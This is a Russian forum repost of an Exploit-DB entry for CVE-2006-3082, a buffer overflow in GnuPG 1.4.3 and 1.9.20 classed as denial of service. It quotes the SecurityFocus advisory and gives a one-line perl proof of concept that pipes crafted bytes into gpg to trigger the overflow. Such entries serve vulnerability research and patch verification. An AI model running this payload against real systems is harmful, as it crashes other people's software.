Exploit GnuPG 1.4.3/1.9.x - Parse_User_ID Remote Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28077
Проверка EDB
  1. Пройдено
Автор
EVGENY LEGEROV
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2006-3082
Дата публикации
2006-06-20
Код:
source: https://www.securityfocus.com/bid/18554/info

GnuPG is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

This issue may allow remote attackers to execute arbitrary machine code in the context of the affected application, but this has not been confirmed.

GnuPG versions 1.4.3 and 1.9.20 are vulnerable to this issue; previous versions may also be affected.

perl -e 'print "\xcd\xff\xff\xff\xff\xfe"'| /var/gnupg/bin/gpg --no-armor
 
Источник
www.exploit-db.com

Похожие темы